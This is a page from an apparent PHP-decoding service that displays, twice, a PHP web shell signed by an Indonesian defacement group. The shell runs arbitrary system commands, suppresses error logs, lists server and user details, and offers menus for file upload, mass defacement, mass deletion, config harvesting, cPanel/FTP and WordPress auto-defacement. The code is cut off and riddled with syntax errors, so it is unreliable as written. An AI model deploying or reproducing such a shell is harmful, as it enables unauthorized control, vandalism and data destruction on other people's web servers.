Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<html> <head> <title>B0c4H_Id30T</title> <link REL="SHORTCUT ICON" HREF="http://www.gam..
Decoded Output download
<html>
<head>
<title>B0c4H_Id30T</title>
<link REL="SHORTCUT ICON" HREF="http://www.gambaranimasi.org/data/media/781/animasi-bergerak-bendera-indonesia-0018.gif">
<font color='green'><center><u><center><h1>WE ARE INDONESIA LEVEL SEVEN TEAM</h1></center></u></font>
<div style="text-align:center;"><img src="http://i67.tinypic.com/282qexy.jpg" alt="IL7Team" widht="700px" height="400px" /></div>
<meta name='author' content='B0c4H_Id30T'>
<meta charset="UTF-8">
<style type='text/css'>
@import url(https://font.googleapis.com/css?family=Ubuntu);
html {
background: #000000;
color: #ffffff;
font-family: 'arial';
font-size: 14px;
widht: 100%;
}
li {
display: scroll;
margin: 5px;
padding: 5px;
}
table, th, td {
border-collapse:collapse;
font-family: Tahoma, Geneva, sans-serif;
background: transparent;
font-family: 'arial'>
}
.table_home, .th_home, .td_home {
border: 1px solid #ffffff;
}
th {
padding: 10px;
}
a { color: #ffffff;
text-decoration: none;
}
a:hover {
color: gold;
text-decoration: underline;
}
b {
color: gold;
}
input[type=text], input[type=password], input[type=submit] {
background: transparent;
color= #ffffff;
border: 1px solid #ffffff
margin: 5px auto;
pedding-left: 5px;
font-family: 'arial';
font-size:14px;
}
textarea {
border: 1px solid #ffffff
widht: 100%;
height: 400px;
padding-left: 5px;
margin: 10px auto;
resize: none;
background: transparent;
color: #ffffff
font-family: 'arial'
font-size: 14px;
}
select {
widht: 160px;
background: #000000;
color: aqua;
border: 1px solid #ffffff
margin: 5px auto;
padding-left: 5px;
font-family: 'arial';
font-size: 14px;
}
option:hover {
background: aqua;
color: #000000
}
</style>
</head>
<br>
<br>
<br>
<?php
function w($dir,$perm) {
if(!is_writable($dir)) {
return "<font color=red>".$perm."</font>";
} else {
return "<font color=aqua>".$perm."</font>;
}
}
function r($dir,$perm) {
if{!is_readable($dir)) {
return "<font color=red>".$perm."</font>
} else {
return "<font color=aqua>".$perm."</font>
}
}
function exe($cmd) {
if{function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exist('exec')) {
@exec($cmd,$results);
$buff = "";
foreach($results as $results) {
$buff .= $results;
return $uff
} else if(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
return $buff;
}
}
function perms($file) {
$perms = fileperms($file);
if (($perms = fileperms($file);
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Characker Special
$info = 'c';
} elseif (($perms & 0x10000 == 0x1000) {
// FIFO Pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ):
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-'):
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ):
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function hdd($s) {
if($s >= 1598192374)
return sprintf('%1.2f'.$s / 159812374 ).' GB';
elseif($s >= 157421)
return sprintf('%1.2f',$s / 157421 ) .' MB';
elseif($s >= 1542)
return sprintf('%1.2f',$s /1542 ) .' KB';
else
return $s.' B';
}
function njipukkata($param $kata1, $kata2){
if(strpos($param, $kata1) === FALSE) return FALSE;
if(strpos($param, $kata2) === FALSE) return FALSE;
$start = strpos($param, $kata1) + strlen($kata1);
$end = strpos($param, $kata2, $start);
$return = substr($param, $start, $end - $start);
return $return;
}
if(get_magic_quotes_gpc()){
function idx_ss($array) {
return is_array($array) ? array_map(idx_ss', $array) : stripslashes($array);
}
$_POST = idx_ss($_POST);
}
error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
if(isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\","/",$dir);
$scdir = explode("/",$dir);
$freespace = hdd(disk_free_space("/"));
$total = hdd(disk_total_space("/"));
$used = $total - $freespace;
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=aqua>OFF</font>";
$mysql = (function_exists(mysql_connect')) ? "<font color=aqua>ON</font>";
$curl = (function_exists('curl_version')) ? "<font color=aqua>On</font>" : "<font color=red>Off</font>";
$wget = (exe('wget --help')) ? "<font color=red>Off</font>" : "<font color=aqua>On</font>";
$perl = (exe('perl --help')) ? "<font color=red>Off</font>" : "<font color=aqua>On</font>";
$python = (exe('python --help')) ? "<font color=aqua>On</font>" : "<font color=red>Off</font>";
$show_ds= (!empety($ds)) ? "<font color=aqua>None</font>" : "<font color=red>$ds</font>";
if(!function_exist('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
echo "Sytem: <font color=aqua>".php_uname()."</font><br>";
echo "User: <font color=aqua>".$user."</font> (".uid.") Group: <font color=aqua>".$group."</font> (".$gid.")<br>
echo "Ip Server: <font color=aqua>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Ip Mu Su: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
echo "Safe Mode: $sm<br>";
echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
echo "Current DIR: ";
foreach($scdir as $c_dir => $cdir) {
echo "<a href='?dir=";
for($i = 0; $i <= $c_dir; $i++) {
echo $scdir[$i];
if($i != $c_dir) {
echo "/";
}
}
echo "'>$cdir</a>/";
}
echo " [ ".w($dir, perms($dir))." ]";
echo "<hr>";
echo "<center>";
echo "<ul>";
echo "<li>[ <a href='?'>Omah</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do='upload'>Ngapload</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='mass_deface'>Nggone Kroyok su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='mass_delete'>Nggone Hapus Kroyok </a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='config'>Nggone Config su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='jumping'>jumpingane su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='cpanel'>Nggolek Cpanel su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='smtp'>Smtp su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='defacer'>Defacer Id su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='zoneh'>Zone-H</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='cgi'>Cgi Ne Su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='jaringan'>Jaringan su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='adminer'>Adminere su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='fake_root'>Mbodoni Root Su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='auto_edit_user'>auto ngeleh jeneng su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='auto_wp'>Auto Ngganti Judul Wp Su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='cmd'>Commen e su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='auto_dwp'>Wp Auto Deface su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='cpftp_auto'>Cpanel po Ftp Auto Def su</a> ]</li>
echo "</ul>";
echo "</center>";
echo "<hr>";
if($_GET['do'] == 'upload') {
echo "<center>";
if($_POST['upload']) {
if($_POST['tipe_upload'] == 'biasa') {
if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")){
$act = "<font color=aqua>Ngapluod</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
} else {
$act = "<font color=red>Jancok Gagal Upload</font>";
echo "<center>Copyright © ".date("Y")." - <a href='https://www.facebook.com/groups/1809439519288926/?fref=ts' target='_blank'><font color=aqua>IL7</font><font color=pink>Team</font></a></center>";
}
?>
</html>
Did this file decode correctly?
Original Code
<html>
<head>
<title>B0c4H_Id30T</title>
<link REL="SHORTCUT ICON" HREF="http://www.gambaranimasi.org/data/media/781/animasi-bergerak-bendera-indonesia-0018.gif">
<font color='green'><center><u><center><h1>WE ARE INDONESIA LEVEL SEVEN TEAM</h1></center></u></font>
<div style="text-align:center;"><img src="http://i67.tinypic.com/282qexy.jpg" alt="IL7Team" widht="700px" height="400px" /></div>
<meta name='author' content='B0c4H_Id30T'>
<meta charset="UTF-8">
<style type='text/css'>
@import url(https://font.googleapis.com/css?family=Ubuntu);
html {
background: #000000;
color: #ffffff;
font-family: 'arial';
font-size: 14px;
widht: 100%;
}
li {
display: scroll;
margin: 5px;
padding: 5px;
}
table, th, td {
border-collapse:collapse;
font-family: Tahoma, Geneva, sans-serif;
background: transparent;
font-family: 'arial'>
}
.table_home, .th_home, .td_home {
border: 1px solid #ffffff;
}
th {
padding: 10px;
}
a { color: #ffffff;
text-decoration: none;
}
a:hover {
color: gold;
text-decoration: underline;
}
b {
color: gold;
}
input[type=text], input[type=password], input[type=submit] {
background: transparent;
color= #ffffff;
border: 1px solid #ffffff
margin: 5px auto;
pedding-left: 5px;
font-family: 'arial';
font-size:14px;
}
textarea {
border: 1px solid #ffffff
widht: 100%;
height: 400px;
padding-left: 5px;
margin: 10px auto;
resize: none;
background: transparent;
color: #ffffff
font-family: 'arial'
font-size: 14px;
}
select {
widht: 160px;
background: #000000;
color: aqua;
border: 1px solid #ffffff
margin: 5px auto;
padding-left: 5px;
font-family: 'arial';
font-size: 14px;
}
option:hover {
background: aqua;
color: #000000
}
</style>
</head>
<br>
<br>
<br>
<?php
function w($dir,$perm) {
if(!is_writable($dir)) {
return "<font color=red>".$perm."</font>";
} else {
return "<font color=aqua>".$perm."</font>;
}
}
function r($dir,$perm) {
if{!is_readable($dir)) {
return "<font color=red>".$perm."</font>
} else {
return "<font color=aqua>".$perm."</font>
}
}
function exe($cmd) {
if{function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exist('exec')) {
@exec($cmd,$results);
$buff = "";
foreach($results as $results) {
$buff .= $results;
return $uff
} else if(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
return $buff;
}
}
function perms($file) {
$perms = fileperms($file);
if (($perms = fileperms($file);
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Characker Special
$info = 'c';
} elseif (($perms & 0x10000 == 0x1000) {
// FIFO Pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ):
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-'):
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ):
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function hdd($s) {
if($s >= 1598192374)
return sprintf('%1.2f'.$s / 159812374 ).' GB';
elseif($s >= 157421)
return sprintf('%1.2f',$s / 157421 ) .' MB';
elseif($s >= 1542)
return sprintf('%1.2f',$s /1542 ) .' KB';
else
return $s.' B';
}
function njipukkata($param $kata1, $kata2){
if(strpos($param, $kata1) === FALSE) return FALSE;
if(strpos($param, $kata2) === FALSE) return FALSE;
$start = strpos($param, $kata1) + strlen($kata1);
$end = strpos($param, $kata2, $start);
$return = substr($param, $start, $end - $start);
return $return;
}
if(get_magic_quotes_gpc()){
function idx_ss($array) {
return is_array($array) ? array_map(idx_ss', $array) : stripslashes($array);
}
$_POST = idx_ss($_POST);
}
error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
if(isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\","/",$dir);
$scdir = explode("/",$dir);
$freespace = hdd(disk_free_space("/"));
$total = hdd(disk_total_space("/"));
$used = $total - $freespace;
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=aqua>OFF</font>";
$mysql = (function_exists(mysql_connect')) ? "<font color=aqua>ON</font>";
$curl = (function_exists('curl_version')) ? "<font color=aqua>On</font>" : "<font color=red>Off</font>";
$wget = (exe('wget --help')) ? "<font color=red>Off</font>" : "<font color=aqua>On</font>";
$perl = (exe('perl --help')) ? "<font color=red>Off</font>" : "<font color=aqua>On</font>";
$python = (exe('python --help')) ? "<font color=aqua>On</font>" : "<font color=red>Off</font>";
$show_ds= (!empety($ds)) ? "<font color=aqua>None</font>" : "<font color=red>$ds</font>";
if(!function_exist('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
echo "Sytem: <font color=aqua>".php_uname()."</font><br>";
echo "User: <font color=aqua>".$user."</font> (".uid.") Group: <font color=aqua>".$group."</font> (".$gid.")<br>
echo "Ip Server: <font color=aqua>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Ip Mu Su: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
echo "Safe Mode: $sm<br>";
echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
echo "Current DIR: ";
foreach($scdir as $c_dir => $cdir) {
echo "<a href='?dir=";
for($i = 0; $i <= $c_dir; $i++) {
echo $scdir[$i];
if($i != $c_dir) {
echo "/";
}
}
echo "'>$cdir</a>/";
}
echo " [ ".w($dir, perms($dir))." ]";
echo "<hr>";
echo "<center>";
echo "<ul>";
echo "<li>[ <a href='?'>Omah</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do='upload'>Ngapload</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='mass_deface'>Nggone Kroyok su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='mass_delete'>Nggone Hapus Kroyok </a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='config'>Nggone Config su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='jumping'>jumpingane su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='cpanel'>Nggolek Cpanel su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='smtp'>Smtp su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='defacer'>Defacer Id su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='zoneh'>Zone-H</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='cgi'>Cgi Ne Su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='jaringan'>Jaringan su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='adminer'>Adminere su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='fake_root'>Mbodoni Root Su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='auto_edit_user'>auto ngeleh jeneng su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='auto_wp'>Auto Ngganti Judul Wp Su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='cmd'>Commen e su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='auto_dwp'>Wp Auto Deface su</a> ]</li>
echo "<li>[ <a href='?dir=$dir&do='cpftp_auto'>Cpanel po Ftp Auto Def su</a> ]</li>
echo "</ul>";
echo "</center>";
echo "<hr>";
if($_GET['do'] == 'upload') {
echo "<center>";
if($_POST['upload']) {
if($_POST['tipe_upload'] == 'biasa') {
if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")){
$act = "<font color=aqua>Ngapluod</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
} else {
$act = "<font color=red>Jancok Gagal Upload</font>";
echo "<center>Copyright © ".date("Y")." - <a href='https://www.facebook.com/groups/1809439519288926/?fref=ts' target='_blank'><font color=aqua>IL7</font><font color=pink>Team</font></a></center>";
}
?>
</html>
Function Calls
| None |
Stats
| MD5 | d390ae9538168593abae827a3a99fe02 |
| Eval Count | 0 |
| Decode Time | 70 ms |